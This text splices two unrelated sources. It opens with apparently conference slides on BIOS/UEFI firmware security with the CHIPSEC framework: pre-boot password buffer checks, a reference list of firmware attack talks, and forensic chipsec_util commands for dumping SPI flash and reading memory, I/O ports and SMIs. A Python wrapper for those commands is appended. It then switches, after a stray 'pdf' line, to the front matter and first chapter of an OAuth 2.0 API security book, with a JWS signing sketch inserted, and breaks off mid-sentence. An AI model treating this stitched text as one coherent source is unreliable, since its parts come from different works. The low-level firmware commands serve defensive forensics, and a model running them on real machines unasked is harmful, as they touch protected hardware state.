FW/BIOS SMI Handlers SPI Flash HW Config/ Protection Secure Boot BIOS Update BIOS Settings (NVRAM, Variables) Option ROMs Firmware Volumes / PE exec. Handling Sensitive Data • BIOS and Pre-OS applications store keystrokes in legacy BIOS keyboard buffer in BIOS data area (at PA = 0x41E) • BIOS, HDD passwords, Full-Disk Encryption PINs etc. • Some BIOS’es didn’t clear keyboard buffer • Bypassing Pre-Boot Authentication Passwords • chipsec_main -m common.bios_kbrd_buffer Pre-Boot Passwords Exposure Secrets in the Keyboard Buffer? 
[*] running module: chipsec.modules.common.bios_kbrd_buffer [x][ ======================================================================= [x][ Module: Pre-boot Passwords in the BIOS Keyboard Buffer [x][ ======================================================================= [*] Keyboard buffer head pointer = 0x3A (at 0x41A), tail pointer = 0x3A (at 0x41C) [*] Keyboard buffer contents (at 0x41E): 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 | 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 | [-] Keyboard buffer tail points inside the buffer (= 0x3A) It may potentially expose lengths of pre-boot passwords. Was your password 15 characters long? [*] Checking contents of the keyboard buffer.. [+] PASSED: Keyboard buffer looks empty. Pre-boot passwords don't seem to be exposed * Better check from EFI shell as OS/pre-boot app might have cleared the keyboard buffer BIOS Attack Surface: SMI Handlers System FW/BIOS SMI Handlers SPI Flash HW Config/ Protection Secure Boot BIOS Update BIOS Settings (NVRAM, Variables) Option ROMs Firmware Volumes / PE exec. What? More Issues With SMI Handlers ? • Coordination Is Ongoing With Independent BIOS Vendors and Platform Manufacturers Multiple UEFI BIOS SMI Handler Vulnerabilities Do BIOS Attacks Require Kernel Privileges? To attack BIOS, exploit needs access to HW: PCIe config, I/O ports, physical memory, etc. So, generally, yes. Kernel privileges are required.. Unless Suitable Kernel Driver Already Signed Legitimate signed OS kernel driver which can do all this on behalf of a user mode app (as a confused deputy). We found suitable driver signed for Windows 64bit versions (co- discovered with researchers from MITRE) Ref: BIOS Security Guidelines / Best Practices CHIPSEC framework: https://github.com/chipsec/chipsec MITRE Copernicus tool NIST BIOS Protection Guidelines (SP 800-147 and SP 800-147B) IAD BIOS Update Protection Profile Windows Hardware Certification Requirements UEFI Forum sub-teams: USST (UEFI Security) and PSST (PI Security) UEFI Firmware Security Best Practices BIOS Flash Regions UEFI Variables in Flash (UEFI Variable Usage Technical Advisory) Capsule Updates SMRAM Secure Boot Ref: BIOS Security Research Security Issues Related to Pentium System Management Mode (CSW 2006) Implementing and Detecting an ACPI BIOS Rootkit (BlackHat EU 2006) Implementing and Detecting a PCI Rootkit (BlackHat DC 2007) Programmed I/O accesses: a threat to Virtual Machine Monitors? 
(PacSec 2007) Hacking the Extensible Firmware Interface (BlackHat USA 2007) BIOS Boot Hijacking And VMWare Vulnerabilities Digging (PoC 2007) Bypassing pre-boot authentication passwords (DEF CON 16) Using SMM for "Other Purposes“ (Phrack65) Persistent BIOS Infection (Phrack66) A New Breed of Malware: The SMM Rootkit (BlackHat USA 2008) Preventing & Detecting Xen Hypervisor Subversions (BlackHat USA 2008) A Real SMM Rootkit: Reversing and Hooking BIOS SMI Handlers (Phrack66) Attacking Intel BIOS (BlackHat USA 2009) Getting Into the SMRAM: SMM Reloaded (CSW 2009, CSW 2009) Attacking SMM Memory via Intel Cache Poisoning (ITL 2009) BIOS SMM Privilege Escalation Vulnerabilities (bugtraq 2009) System Management Mode Design and Security Issues (IT Defense 2010) Analysis of building blocks and attack vectors associated with UEFI (SANS Institute) (U)EFI Bootkits (BlackHat USA 2012 @snare, SaferBytes 2012 Andrea Allievi, HITB 2013) Evil Maid Just Got Angrier (CSW 2013) A Tale of One Software Bypass of Windows 8 Secure Boot (BlackHat USA 2013) BIOS Chronomancy (NoSuchCon 2013, BlackHat USA 2013, Hack.lu 2013) Defeating Signed BIOS Enforcement (PacSec 2013, Ekoparty 2013) UEFI and PCI BootKit (PacSec 2013) Meet ‘badBIOS’ the mysterious Mac and PC malware that jumps airgaps (#badBios) All Your Boot Are Belong To Us (CanSecWest 2014 Intel and MITRE) Setup for Failure: Defeating Secure Boot (Syscan 2014) Setup for Failure: More Ways to Defeat Secure Boot (HITB 2014 AMS) Analytics, and Scalability, and UEFI Exploitation (INFILTRATE 2014) PC Firmware Attacks, Copernicus and You (AusCERT 2014) Extreme Privilege Escalation (BlackHat USA 2014) THANK YOU! BACKUP: Platform Firmware / BIOS Forensics With CHIPSEC framework (https://github.com/chipsec/chipsec) Forensics Functionality Live system firmware analysis (BIOS malware can defeat SW acquisition) chipsec_util spi info chipsec_util spi dump rom.bin chipsec_util spi read 0x700000 0x100000 bios.bin chipsec_util uefi var-list chipsec_util uefi var-read db D719B2CB-3D3A-4596- A3BC-DAD00E67656F db.bin Offline system firmware analysis chipsec_util uefi keys PK.bin chipsec_util uefi nvram vss bios.bin chipsec_util uefi decode rom.bin chipsec_util decode rom.bin Manual Access to HW Resources chipsec_util msr 0x200 chipsec_util mem 0x0 0x41E 0x20 chipsec_util pci enumerate chipsec_util pci 0x0 0x1F 0x0 0xDC byte chipsec_util io 0x61 byte chipsec_util mmcfg 0 0x1F 0 0xDC 1 0x1 chipsec_util mmio list chipsec_util cmos dump chipsec_util ucode id chipsec_util smi 0x01 0xFF chipsec_util idt 0 chipsec_util cpuid 1 chipsec_util spi read 0x700000 0x100000 bios.bin chipsec_util decode spi.bin chipsec_util uefi var-list ..
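The chipsec_util commands listed in the forensics backup slides compose naturally into a small acquisition script. Below is a hedged sketch of such a wrapper in Python; the command strings are the ones shown on the slides, the output file names are placeholders, and it assumes CHIPSEC is installed with its helper driver loaded and the script is run with root/administrator privileges.

import shlex
import subprocess

# Live acquisition commands, taken from the slide above; file names are placeholders
ACQUISITION = [
    "chipsec_util spi info",
    "chipsec_util spi dump rom.bin",
    "chipsec_util uefi var-list",
]

# Offline analysis of the dumped image, also taken from the slide above
OFFLINE_ANALYSIS = [
    "chipsec_util uefi nvram vss rom.bin",   # parse the NVRAM variable store out of the dump
    "chipsec_util decode rom.bin",           # decode firmware volumes and embedded executables
]

def run(commands):
    for cmd in commands:
        print("[>]", cmd)
        result = subprocess.run(shlex.split(cmd), capture_output=True, text=True)
        print(result.stdout)
        if result.returncode != 0:
            print("[!] command failed:", result.stderr)

if __name__ == "__main__":
    run(ACQUISITION)        # on the live target machine
    run(OFFLINE_ANALYSIS)   # can be repeated later against the dumped image

As the slides note, software-only acquisition can be defeated by BIOS-resident malware, so a dump gathered this way is a triage artifact rather than ground truth.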
pdf
Advanced API Security OAuth 2.0 and Beyond — Second Edition — Prabath Siriwardena Advanced API Security OAuth 2.0 and Beyond Second Edition Prabath Siriwardena Advanced API Security: OAuth 2.0 and Beyond ISBN-13 (pbk): 978-1-4842-2049-8 ISBN-13 (electronic): 978-1-4842-2050-4 https://doi.org/10.1007/978-1-4842-2050-4 Copyright © 2020 by Prabath Siriwardena This work is subject to copyright. All rights are reserved by the Publisher, whether the whole or part of the material is concerned, specifically the rights of translation, reprinting, reuse of illustrations, recitation, broadcasting, reproduction on microfilms or in any other physical way, and transmission or information storage and retrieval, electronic adaptation, computer software, or by similar or dissimilar methodology now known or hereafter developed. Trademarked names, logos, and images may appear in this book. Rather than use a trademark symbol with every occurrence of a trademarked name, logo, or image we use the names, logos, and images only in an editorial fashion and to the benefit of the trademark owner, with no intention of infringement of the trademark. The use in this publication of trade names, trademarks, service marks, and similar terms, even if they are not identified as such, is not to be taken as an expression of opinion as to whether or not they are subject to proprietary rights. While the advice and information in this book are believed to be true and accurate at the date of publication, neither the authors nor the editors nor the publisher can accept any legal responsibility for any errors or omissions that may be made. The publisher makes no warranty, express or implied, with respect to the material contained herein. Managing Director, Apress Media LLC: Welmoed Spahr Acquisitions Editor: Jonathan Gennick Development Editor: Laura Berendson Coordinating Editor: Jill Balzano Cover image designed by Freepik (www.freepik.com) Distributed to the book trade worldwide by Springer Science+Business Media New York, 233 Spring Street, 6th Floor, New York, NY 10013. Phone 1-800-SPRINGER, fax (201) 348-4505, e-mail orders-ny@springer- sbm.com, or visit www.springeronline.com. Apress Media, LLC is a California LLC and the sole member (owner) is Springer Science + Business Media Finance Inc (SSBM Finance Inc). SSBM Finance Inc is a Delaware corporation. For information on translations, please e-mail rights@apress.com, or visit http://www.apress.com/ rights-permissions. Apress titles may be purchased in bulk for academic, corporate, or promotional use. eBook versions and licenses are also available for most titles. For more information, reference our Print and eBook Bulk Sales web page at http://www.apress.com/bulk-sales. Any source code or other supplementary material referenced by the author in this book is available to readers on GitHub via the book’s product page, located at www.apress.com/9781484220498. For more detailed information, please visit http://www.apress.com/source-code. Printed on acid-free paper Prabath Siriwardena San Jose, CA, USA This book is dedicated to my sister Deepani, who backed me all the time! v Chapter 1: APIs Rule!................................................................................................ 
1 API Economy 1 Amazon 3 Salesforce 5 Uber 5 Facebook 6 Netflix 7 Walgreens 8 Governments 9 IBM Watson 9 Open Banking 10 Healthcare 10 Wearables 11 Business Models 12 The API Evolution 13 API Management 20 The Role of APIs in Microservices 25 Summary 32 Chapter 2: Designing Security for APIs .................................................................. 33 Trinity of Trouble 34 Design Challenges 37 Table of Contents About the Author .....................................................................................................xv Acknowledgments .................................................................................................xvii Introduction ............................................................................................................xix vi User Experience 38 Performance 39 Weakest Link 40 Defense in Depth 41 Insider Attacks 42 Security by Obscurity 44 Design Principles 45 Least Privilege 45 Fail-Safe Defaults 46 Economy of Mechanism 48 Complete Mediation 49 Open Design 49 Separation of Privilege 51 Least Common Mechanism 52 Psychological Acceptability 53 Security Triad 54 Confidentiality 54 Integrity 56 Availability 57 Security Control 59 Authentication 59 Authorization 62 Nonrepudiation 64 Auditing 65 Summary 65 Chapter 3: Securing APIs with Transport Layer Security (TLS) .............................. 69 Setting Up the Environment 69 Deploying Order API 71 Securing Order API with Transport Layer Security (TLS) 74 Protecting Order API with Mutual TLS 76 Table of ConTenTs vii Running OpenSSL on Docker 78 Summary 79 Chapter 4: OAuth 2.0 Fundamentals ....................................................................... 81 Understanding OAuth 20 81 OAuth 20 Actors 83 Grant Types 84 Authorization Code Grant Type 85 Implicit Grant Type 88 Resource Owner Password Credentials Grant Type 90 Client Credentials Grant Type 91 Refresh Grant Type 92 How to Pick the Right Grant Type? 93 OAuth 20 Token Types 94 OAuth 20 Bearer Token Profile 94 OAuth 20 Client Types 96 JWT Secured Authorization Request (JAR) 97 Pushed Authorization Requests (PAR) 99 Summary 101 Chapter 5: Edge Security with an API Gateway .................................................... 103 Setting Up Zuul API Gateway 103 Running the Order API 104 Running the Zuul API Gateway 105 What Happens Underneath? 107 Enabling TLS for the Zuul API Gateway 107 Enforcing OAuth 20 Token Validation at the Zuul API Gateway 109 Setting Up an OAuth 20 Security Token Service (STS) 110 Testing OAuth 20 Security Token Service (STS) 112 Setting Up Zuul API Gateway for OAuth 20 Token Validation 114 Enabling Mutual TLS Between Zuul API Gateway and Order Service 117 Securing Order API with Self-Contained Access Tokens 121 Table of ConTenTs viii Setting Up an Authorization Server to Issue JWT 121 Protecting Zuul API Gateway with JWT 124 The Role of a Web Application Firewall (WAF) 125 Summary 126 Chapter 6: OpenID Connect (OIDC) ........................................................................ 129 From OpenID to OIDC 129 Amazon Still Uses OpenID 20 132 Understanding OpenID Connect 133 Anatomy of the ID Token 134 OpenID Connect Request 139 Requesting User Attributes 142 OpenID Connect Flows 144 Requesting Custom User Attributes 145 OpenID Connect Discovery 146 OpenID Connect Identity Provider Metadata 149 Dynamic Client Registration 151 OpenID Connect for Securing APIs 153 Summary 155 Chapter 7: Message-Level Security with JSON Web Signature ............................ 
157 Understanding JSON Web Token (JWT) 157 JOSE Header 158 JWT Claims Set 160 JWT Signature 163 JSON Web Signature (JWS) 167 JWS Compact Serialization 167 The Process of Signing (Compact Serialization) 172 JWS JSON Serialization 174 The Process of Signing (JSON Serialization) 176 Summary 184 Table of ConTenTs ix Chapter 8: Message-Level Security with JSON Web Encryption .......................... 185 JWE Compact Serialization 185 JOSE Header 186 JWE Encrypted Key 191 JWE Initialization Vector 194 JWE Ciphertext 194 JWE Authentication Tag 194 The Process of Encryption (Compact Serialization) 195 JWE JSON Serialization 196 JWE Protected Header 197 JWE Shared Unprotected Header 197 JWE Per-Recipient Unprotected Header 198 JWE Initialization Vector 198 JWE Ciphertext 198 JWE Authentication Tag 199 The Process of Encryption (JSON Serialization) 199 Nested JWTs 201 Summary 210 Chapter 9: OAuth 2.0 Profiles ............................................................................... 211 Token Introspection 211 Chain Grant Type 215 Token Exchange 217 Dynamic Client Registration Profile 220 Token Revocation Profile 225 Summary 226 Chapter 10: Accessing APIs via Native Mobile Apps ............................................ 227 Mobile Single Sign-On (SSO) 227 Login with Direct Credentials 228 Login with WebView 229 Login with a System Browser 230 Table of ConTenTs x Using OAuth 20 in Native Mobile Apps 231 Inter-app Communication 233 Proof Key for Code Exchange (PKCE) 235 Browser-less Apps 237 OAuth 20 Device Authorization Grant 237 Summary 241 Chapter 11: OAuth 2.0 Token Binding ................................................................... 243 Understanding Token Binding 244 Token Binding Negotiation 244 TLS Extension for Token Binding Protocol Negotiation 246 Key Generation 247 Proof of Possession 247 Token Binding for OAuth 20 Refresh Token 249 Token Binding for OAuth 20 Authorization Code/Access Token 251 TLS Termination 254 Summary 255 Chapter 12: Federating Access to APIs ................................................................ 257 Enabling Federation 257 Brokered Authentication 258 Security Assertion Markup Language (SAML) 261 SAML 20 Client Authentication 261 SAML Grant Type for OAuth 20 264 JWT Grant Type for OAuth 20 267 Applications of JWT Grant Type 269 JWT Client Authentication 270 Applications of JWT Client Authentication 271 Parsing and Validating JWT 274 Summary 276 Table of ConTenTs xi Chapter 13: User-Managed Access ....................................................................... 277 Use Cases 277 UMA 20 Roles 279 UMA Protocol 280 Interactive Claims Gathering 284 Summary 286 Chapter 14: OAuth 2.0 Security ............................................................................ 287 Identity Provider Mix-Up 287 Cross-Site Request Forgery (CSRF) 291 Token Reuse 294 Token Leakage/Export 296 Open Redirector 298 Code Interception Attack 300 Security Flaws in Implicit Grant Type 301 Google Docs Phishing Attack 302 Summary 304 Chapter 15: Patterns and Practices ...................................................................... 
305 Direct Authentication with the Trusted Subsystem 305 Single Sign-On with the Delegated Access Control 306 Single Sign-On with the Integrated Windows Authentication 308 Identity Proxy with the Delegated Access Control 309 Delegated Access Control with the JSON Web Token 310 Nonrepudiation with the JSON Web Signature 311 Chained Access Delegation 313 Trusted Master Access Delegation 315 Resource Security Token Service (STS) with the Delegated Access Control 316 Delegated Access Control with No Credentials over the Wire 318 Summary 319 Table of ConTenTs xii Appendix A: The Evolution of Identity Delegation ................................................. 321 Direct Delegation vs Brokered Delegation 322 The Evolution 323 Google ClientLogin 325 Google AuthSub 326 Flickr Authentication API 327 Yahoo! Browser–Based Authentication (BBAuth) 327 OAuth 328 Appendix B: OAuth 1.0 .......................................................................................... 331 The Token Dance 331 Temporary-Credential Request Phase 333 Resource-Owner Authorization Phase 335 Token-Credential Request Phase 336 Invoking a Secured Business API with OAuth 10 338 Demystifying oauth_signature 339 Generating the Base String in Temporary-Credential Request Phase 340 Generating the Base String in Token Credential Request Phase 342 Building the Signature 343 Generating the Base String in an API Call 344 Three-Legged OAuth vs Two-Legged OAuth 346 OAuth WRAP 347 Client Account and Password Profile 349 Assertion Profile 350 Username and Password Profile 350 Web App Profile 352 Rich App Profile 353 Accessing a WRAP-Protected API 354 WRAP to OAuth 20 354 Table of ConTenTs xiii Appendix C: How Transport Layer Security Works? ............................................. 355 The Evolution of Transport Layer Security (TLS) 356 Transmission Control Protocol (TCP) 358 How Transport Layer Security (TLS) Works 364 Transport Layer Security (TLS) Handshake 365 Application Data Transfer 374 Appendix D: UMA Evolution .................................................................................. 377 ProtectServe 377 UMA and OAuth 384 UMA 10 Architecture 384 UMA 10 Phases 385 UMA Phase 1: Protecting a Resource 385 UMA Phase 2: Getting Authorization 388 UMA Phase 3: Accessing the Protected Resource 394 UMA APIs 394 Protection API 395 Authorization API 396 Appendix E: Base64 URL Encoding ....................................................................... 397 Appendix F: Basic/Digest Authentication ............................................................. 401 HTTP Basic Authentication 402 HTTP Digest Authentication 406 Appendix G: OAuth 2.0 MAC Token Profile ............................................................ 425 Bearer Token vs MAC Token 427 Obtaining a MAC Token 428 Invoking an API Protected with the OAuth 20 MAC Token Profile 432 Calculating the MAC 433 Table of ConTenTs xiv MAC Validation by the Resource Server 435 OAuth Grant Types and the MAC Token Profile 436 OAuth 10 vs OAuth 20 MAC Token Profile 436 Index ..................................................................................................................... 439 Table of ConTenTs xv About the Author Prabath Siriwardena is an identity evangelist, author, blogger, and VP of Identity Management and Security at WSO2. He has more than 12 years of industry experience in designing and building critical identity and access management (IAM) infrastructure for global enterprises, including many Fortune 100/500 companies. 
As a technology evangelist, Prabath has published seven books. He blogs on various topics from blockchain, PSD2, GDPR, IAM to microservices security. He also runs a YouTube channel. Prabath has spoken at many conferences, including RSA Conference, KNOW Identity, Identiverse, European Identity Conference, Consumer Identity World USA, API World, API Strategy and Practice Conference, QCon, OSCON, and WSO2Con. He has traveled the world conducting workshops and meetups to evangelize IAM communities. He is the founder of the Silicon Valley IAM User Group, which is the largest IAM meetup in the San Francisco Bay Area. xvii Acknowledgments I would first like to thank Jonathan Gennick, Assistant Editorial Director at Apress, for evaluating and accepting my proposal for this book. Then, I must thank Jill Balzano, Coordinating Editor at Apress, who was very patient and tolerant of me throughout the publishing process. Alp Tunc served as the technical reviewer—thanks, Alp, for your quality review comments, which were quite useful. Also I would like to thank all the external reviewers of the book, who helped to make the book better. Dr. Sanjiva Weerawarana, the Founder and former CEO of WSO2, and Paul Fremantle, the CTO of WSO2, are two constant mentors for me. I am truly grateful to both Dr. Sanjiva and Paul for everything they have done for me. My wife, Pavithra, and my little daughter, Dinadi, supported me throughout this process. Thank you very much, Pavithra and Dinadi. My parents and my sister are with me all the time. I am grateful to them for everything they have done for me. Last but not least, my wife’s parents—they were amazingly helpful. Although writing a book may sound like a one-man effort, it’s the entire team behind it who makes it a reality. Thank you to everyone who supported me in many different ways. xix Introduction Enterprise APIs have become the common way of exposing business functions to the outside world. Exposing functionality is convenient, but of course comes with a risk of exploitation. This book is about securing your most important business assets or APIs. As is the case with any software system design, people tend to ignore the security element during the API design phase. Only at the deployment or at the time of integration they start worrying about security. Security should never be an afterthought—it’s an integral part of any software system design, and it should be well thought out from the design’s inception. One objective of this book is to educate the reader about the need for security and the available options for securing APIs. The book guides you through the process and shares best practices for designing APIs for better security. API security has evolved a lot in the last few years. The growth of standards for securing APIs has been exponential. OAuth 2.0 is the most widely adopted standard. It’s more than just a standard—rather a framework that lets people build solutions on top of it. The book explains in depth how to secure APIs from traditional HTTP Basic authentication to OAuth 2.0 and the profiles built around OAuth, such as OpenID Connect, User-Managed Access (UMA), and many more. JSON plays a major role in API communication. Most of the APIs developed today support only JSON, not XML. The book focuses on JSON security. JSON Web Encryption (JWE) and JSON Web Signature (JWS) are two increasingly popular standards for securing JSON messages. The latter part of the book covers JWE and JWS in detail. 
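As a concrete taste of the JSON security material covered later in the book, here is a minimal sketch of producing a JWS compact serialization with the HS256 (HMAC-SHA256) algorithm using only the Python standard library; the key and claims are illustrative placeholders, and real deployments would normally use a vetted JOSE library rather than hand-rolling this.

import base64
import hashlib
import hmac
import json

def b64url(data: bytes) -> str:
    # Base64url encoding without padding, as required for JWS compact serialization
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def jws_hs256(payload: dict, key: bytes) -> str:
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = b64url(json.dumps(header).encode()) + "." + b64url(json.dumps(payload).encode())
    signature = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(signature)

# Example with placeholder values: three base64url segments, header.payload.signature
token = jws_hs256({"sub": "prabath", "scope": "read"}, b"shared-secret")
print(token)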
Another major objective of the book is to not just present concepts and theories but also to explain concepts and theories with concrete examples. The book presents a comprehensive set of examples to illustrate how to apply theory in practice. You will learn about using OAuth 2.0 and related profiles to access APIs securely with web applications, single-page applications, native mobile applications and browser-less applications. I hope this book effectively covers a much-needed subject matter for API developers, and I hope you enjoy reading it. 1 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_1 CHAPTER 1 APIs Rule! Enterprise API adoption has exceeded expectations. We see the proliferation of APIs in almost all the industries. It is not an exaggeration to say a business without an API is like a computer with no Internet. APIs are also the foundation for building communication channels in the Internet of Things (IoT) domain. From motor vehicles to kitchen appliances, countless devices have started communicating with each other via APIs. The world is more connected than ever. You share photos from Instagram in Facebook, share a location from Foursquare or Yelp in Twitter, publish tweets to the Facebook wall, connect to Google Maps via the Uber mobile app, and many more. The list of connections is limitless. All this is made possible only because of public APIs, which have proliferated in the last few years. Expedia, Salesforce, eBay, and many other companies generate a large percentage of their annual revenue via APIs. APIs have become the coolest way of exposing business functionalities to the outside world. API Economy According to an infographic1 published by the ACI Information Group, at the current rate of growth, the global Internet economy is around 10 trillion US dollars. In 1984, at the time the Internet was debuted, it linked 1000 hosts at universities and corporates. In 1998, after almost 15 years, the number of Internet users, globally, reached 50 million. It took 11 years since then to reach the magic number 1 billion Internet users, in 2009. It took just three years since then to get doubled, and in 2012 it reached to 2.1 billion. In 2019, more than half of the world’s population—about 4.3 billion people—use the Internet. This number could further increase as a result of the initiatives taken by the Internet giants like Facebook and Google. The Internet.org initiative by Facebook, 1 The History of the Internet, http://aci.info/2014/07/12/the-data-explosion-in- 2014-minute-by-minute-infographic/ 2 launched in 2013, targets to bring together technology leaders, nonprofits, and local communities to connect with the rest of the world that does not have Internet access. Google Loon is a project initiated by Google to connect people in rural and remote areas. It is based on a network of balloons traveling on the edge of space and aims to improve the connectivity of 250 million people in Southeast Asia.2 Not just humans, according to a report3 on the Internet of Things by Cisco, during 2008, the number of things connected to the Internet exceeded the number of people on earth. Over 12.5 billion devices were connected to the Internet in 2012 and 25 billion devices by the end of 2015. It is estimated that by the end of 2020, 50 billion devices will be connected. Connected devices are nothing new. They’ve been there since the introduction of the first computer networks and consumer electronics. 
However, if not for the explosion of the Internet adoption, the idea of a globally connected planet would never take off. In the early 1990s, computer scientists theorized how a marriage between humans and machines could give birth to a completely new form of communication and interaction via machines. That reality is now unfolding before our eyes. There are two key enablers behind the success of the Internet of Things. One is the APIs and the other is Big Data. According to a report4 by Wipro Council for Industry Research, a six-hour flight on a Boeing 737 from New York to Los Angeles generates 120 terabytes of data that is collected and stored on the plane. With the explosion of sensors and devices taking over the world, there needs to be a proper way of storing, managing, and analyzing data. By 2014, an estimated 4 zettabytes of information was held globally, and it’s estimated, by 2020, that number will climb up to 35 zettabytes.5 Most interestingly, 90% of the data we have in hand today is generated just during the last couple of years. The role of APIs under the context of the Internet of Things is equally important as Big Data. APIs are the glue which connect devices to other devices and to the cloud. 2 Google Loon, http://fortune.com/2015/10/29/google-indonesia-internet-helium- balloons/ 3 The Internet of Things: How the Next Evolution of the Internet Is Changing Everything, www.iotsworldcongress.com/documents/4643185/3e968a44-2d12-4b73-9691-17ec508ff67b 4 Big Data: Catalyzing Performance in Manufacturing, www.wipro.com/documents/Big%20Data.pdf 5 Big data explosion: 90% of existing data globally created in the past two years alone, http://bit.ly/1WajrG2 Chapter 1 apIs rule! 3 The API economy talks about how an organization can become profitable or successful in their corresponding business domain with APIs. IBM estimated the API economy to become a $2.2 trillion market by 2018,6 and the IBM Redbook, The Power of the API Economy,7 defines API economy as the commercial exchange of business functions, capabilities, or competencies as services using web APIs. It further finds five main reasons why enterprises should embrace web APIs and become an active participant in the API economy: • Grow your customer base by attracting customers to your products and services through API ecosystems. • Drive innovation by capitalizing on the composition of different APIs, yours and third parties. • Improve the time-to-value and time-to-market for new products. • Improve integration with web APIs. • Open up more possibilities for a new era of computing and prepare for a flexible future. Amazon Amazon, Salesforce, Facebook, and Twitter are few very good examples for early entrants into the API economy, by building platforms for their respective capabilities. Today, all of them hugely benefit from the widespread ecosystems built around these platforms. Amazon was one of the very first enterprises to adopt APIs to expose its business functionalities to the rest. In 2006 it started to offer IT infrastructure services to businesses in the form of web APIs or web services. Amazon Web Services (AWS), which initially included EC2 (Elastic Compute Cloud) and S3 (Simple Storage Service), was a result of the thought process initiated in 2002 to lead Amazon’s internal infrastructure in a service-oriented manner. 
6 IBM announces new solutions for the API economy, http://betanews.com/2015/11/05/ ibm-announces-new-solutions-for-the-api-economy/ 7 The Power of the API Economy, www.redbooks.ibm.com/redpapers/pdfs/redp5096.pdf Chapter 1 apIs rule! 4 The former Amazon employee, Steve Yegge, shared accidentally an Amazon internal discussion via his Google+ post, which became popular later. According to Yegge’s post,8 it all began with a letter from Jeff Bezos to the Amazon engineering team, which highlighted five key points to transform Amazon into a highly effective service-oriented infrastructure. • All teams will henceforth expose their data and functionality through service interfaces. • Teams must communicate with each other through these interfaces. • There will be no other form of interprocess communication allowed: no direct linking, no direct reads of another team's data store, no shared memory model, no backdoors whatsoever. The only communication allowed is via service interface calls over the network. • It doesn't matter what technology is used. HTTP, Corba, Pubsub, custom protocols—doesn't matter. • All service interfaces, without exception, must be designed from the ground up to be externalizable. That is to say, the team must plan and design to be able to expose the interface to developers in the outside world. No exceptions. This service-based approach leads Amazon to easily expand its business model from being a bookseller to a global retailer in selling IT services or cloud services. Amazon started exposing both EC2 and S3 capabilities as APIs, both in SOAP and REST (JSON over HTTP). 8 Steve Yegge on Amazon, https://plus.google.com/+RipRowan/posts/eVeouesvaVX Chapter 1 apIs rule! 5 Salesforce Salesforce, which was launched in February 1999, is a leader in the software-as-a-service space today. The web API built around Salesforce capabilities and exposing it to the rest was a key success factor which took the company to the state where it is today. Salesforce kept on using platforms and APIs to fuel the innovation and to build a larger ecosystem around it. Uber Google exposes most of its services via APIs. The Google Maps API, which was introduced in 2005 as a free service, lets many developers consume Google Maps to create much useful mashups by integrating with other data streams. Best example is the Uber. Uber is a transportation network company based out of San Francisco, USA, which also offers its services globally in many countries outside the United States. With the Uber mobile application on iOS or Android (see Figure 1-1), its customers, who set a pickup location and request a ride, can see on Google Maps where the corresponding taxi is. Also, from the Uber driver’s application, the driver can exactly pinpoint where the customer is. This is a great selling point for Uber, and Uber as a business hugely benefits from the Google Maps public API. At the same time, Google gets track of all the Uber rides. They know exactly the places of interests and the routes Uber customers take, which can be pumped into Google’s ad engine. Not just Uber, according to a report9 by Google, by 2013 more than 1 million active sites and applications were using Google Maps API. 9 A fresh new look for the Maps API, for all one million sites, http://bit.ly/1NPH12z Chapter 1 apIs rule! 6 Facebook Facebook in 2007 launched the Facebook platform. The Facebook platform made most of the Facebook’s core capabilities available publicly to the application developers. 
According to the builtwith.com,10 the Facebook Graph API was used by 1 million web sites across the Internet, by October 2019. Figure 1-2 shows the Facebook Graph API usage over time. Most of the popular applications like Foursquare, Yelp, Instagram, and many more consume Facebook API to publish data to the user’s Facebook wall. Both parties mutually benefit from this, by expanding the adaptation and building a strong ecosystem. Figure 1-1. Uber mobile app uses Google Maps 10 Facebook Graph API Usage Statistics, http://trends.builtwith.com/javascript/ Facebook-Graph-API Chapter 1 apIs rule! 7 Netflix Netflix, a popular media streaming service in the United States with more than 150 million subscribers, announced its very first public API in 2008.11 During the launch, Daniel Jacobson, the Vice President of Edge Engineering at Netflix, explained the role of this public API as a broker, which mediates data between internal services and public developers. Netflix has come a long way since its first public API launch, and today it has more than a thousand types of devices supporting its streaming API.12 By mid-2014, there were 5 billion API requests generated internally (via devices used to stream the content) and 2 million public API requests daily. Figure 1-2. Facebook Graph API usage statistics, the number of web sites over time 11 Netflix added record number of subscribers, www.cnn.com/2019/04/16/media/netflix- earnings-2019-first-quarter/index.html 12 API Economy: From systems to business services, http://bit.ly/1GxmZe6 Chapter 1 apIs rule! 8 Walgreens Walgreens, the largest drug retailing chain in the United States, opened up its photo printing and pharmacies to the public in 2012/2013, via an API.13 They started with two APIs, a QuickPrints API and a Prescription API. This attracted many developers, and dozens of applications were developed to consume Walgreens’ API. Printicular is one such application developed by MEA Labs, which can be used to print photos from Facebook, Twitter, Instagram, Google+, Picasa, and Flickr (see Figure 1-3). Once you pick your photos from any of these connected sites to be printed, you have the option to pick the printed photos from the closest Walgreens store or also can request to deliver. With the large number of applications built against its API, Walgreens was able to meet its expectations by enhancing customer engagements. Figure 1-3. Printicular application written against the Walgreens API 13 Walgreens API, https://developer.walgreens.com/apis Chapter 1 apIs rule! 9 Governments Not just the private enterprises but also governments started exposing its capabilities via APIs. On May 22, 2013, Data.gov (an initiative managed by the US General Services Administration, with the aim to improve public access to high-value, machine-readable datasets generated by the executive branch of the federal government) launched two initiatives to mark both the anniversary of the Digital Government Strategy and the fourth anniversary of Data.gov. First is a comprehensive listing of APIs that were released from across the federal government as part of the Digital Government Strategy. These APIs accelerated the development of new applications on everything from health, public safety, education, consumer protection, and many more topics of interest to Americans. This initiative also helped developers, where they can find all the government’s APIs in one place (http://api.data.gov), with links to API documentation and other resources. 
IBM Watson APIs have become the key ingredients in building a successful enterprise. APIs open up the road to new business ecosystems. Opportunities that never existed before can be realized with a public API. In November 2013, for the first time, IBM Watson technology was made available as a development platform in the cloud, to enable a worldwide community of software developers to build a new generation of applications infused with Watson's cognitive computing intelligence.14 With the API, IBM also expected to create multiple ecosystems that will open up new market places. It connected Elsevier (world-leading provider of scientific, technical, and medical information products and services) and its expansive archive of studies on oncology care to both the medical expertise of Sloan Kettering (a cancer treatment and research institution founded in 1884) and Watson’s cognitive computing prowess. Through these links, IBM now provides physicians and nurse practitioners with information on symptoms, diagnosis, and treatment approaches. 14 IBM Watson’s Next Venture, www-03.ibm.com/press/us/en/pressrelease/42451.wss Chapter 1 apIs rule! 10 Open Banking API adaptation has gone viral across verticals: retail, healthcare, financial, government, education, and in many more verticals. In the financial sector, the Open Bank15 project provides an open source API and app store for 